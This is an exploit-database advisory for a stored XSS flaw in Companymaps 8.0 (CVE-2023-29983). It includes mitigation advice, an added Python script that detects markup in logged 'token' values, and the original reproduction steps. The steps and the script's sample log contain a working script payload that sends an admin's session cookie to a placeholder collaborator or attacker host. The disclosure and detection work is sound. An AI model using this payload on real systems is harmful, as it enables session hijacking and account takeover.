Vendor: Companymaps
By: Lucas Noki (0xPrototype)
CVSS: 5.4 (MEDIUM)
Type: Stored Cross Site Scripting (XSS)
CWE: 79
Product Name: Companymaps
Affected Version From: 8
Affected Version To: 8
Patch Exists: NO
Related CVE: CVE-2023-29983
CPE: a:vogtmh:companymaps:8.0
Metasploit:
Other Scripts:
Platforms Tested: Mac, Windows, Linux
Year: 2023

Companymaps V8.0 – Stored Cross Site Scripting (XSS)

Companymaps V8.0 is vulnerable to stored cross-site scripting (XSS). The value of the 'token' parameter sent to the '/rest/update/?token=' endpoint is stored and later rendered in the audit log without encoding, so script supplied there runs in the browser of any admin who opens the auditlog tab. This lets the attacker steal the admin's session cookie and potentially gain unauthorized access to the application.

Mitigation:

To mitigate this vulnerability, the vendor should validate the 'token' parameter against its expected format on input and HTML-encode stored values when rendering the audit log, so that any submitted markup is displayed as text rather than executed.
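As an added example (not from the advisory or the cmaps project), the following Python script checks a web-server access log for 'token' values sent to /rest/update/ that contain markup, and shows the audit-log rendering of such a value with and without HTML encoding. It assumes Combined Log Format lines and that the audit log places the token inside an HTML text node; the log lines are constructed, and attacker.example is a placeholder.

```python
"""Detection and output-encoding check for the Companymaps audit-log stored XSS.
Added example; not part of the advisory or of the cmaps code base."""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Combined Log Format, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [27/Apr/2023:10:00:01 +0000] "GET /rest/update/?token=abc123 HTTP/1.1" 200 17
10.0.0.9 - - [27/Apr/2023:10:00:02 +0000] "GET /rest/update/?token=%3Cscript%3Enew%20Image().src%3D%60http%3A%2F%2Fattacker.example%2F%3Fc%3D%24%7Bdocument.cookie%7D%60%3C%2Fscript%3E HTTP/1.1" 200 17
10.0.0.7 - - [27/Apr/2023:10:00:03 +0000] "GET /admin/index.php?tab=auditlog HTTP/1.1" 200 5120
"""

# Request line inside the quoted part of a log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Characters and fragments that have no business in a legitimate token value.
MARKUP_RE = re.compile(r"[<>\"']|javascript:|on\w+\s*=", re.IGNORECASE)


def suspicious_tokens(log_text: str) -> list[str]:
    """Return decoded 'token' values sent to /rest/update/ that contain markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path.rstrip("/") != "/rest/update":
            continue
        for token in parse_qs(parts.query).get("token", []):
            # parse_qs already percent-decodes once; a second unquote
            # catches double-encoded submissions meant to slip past filters.
            decoded = unquote(token)
            if MARKUP_RE.search(decoded):
                hits.append(decoded)
    return hits


def render_audit_entry(token: str, encode: bool = True) -> str:
    """Build the audit-log table cell for a stored token.

    encode=True is the fix (HTML-encode before output); encode=False mirrors
    the vulnerable behaviour, where the raw token lands in the page as markup.
    """
    value = html.escape(token, quote=True) if encode else token
    return f"<td>{value}</td>"


if __name__ == "__main__":
    for hit in suspicious_tokens(SAMPLE_LOG):
        print("suspicious token:", hit)
        print("encoded cell:   ", render_audit_entry(hit))
```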

Exploit-DB raw data:

# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Log in to the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter

In a real-world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks go out to iCaotix, who greatly helped me in getting the environment set up as well as debugging my payload.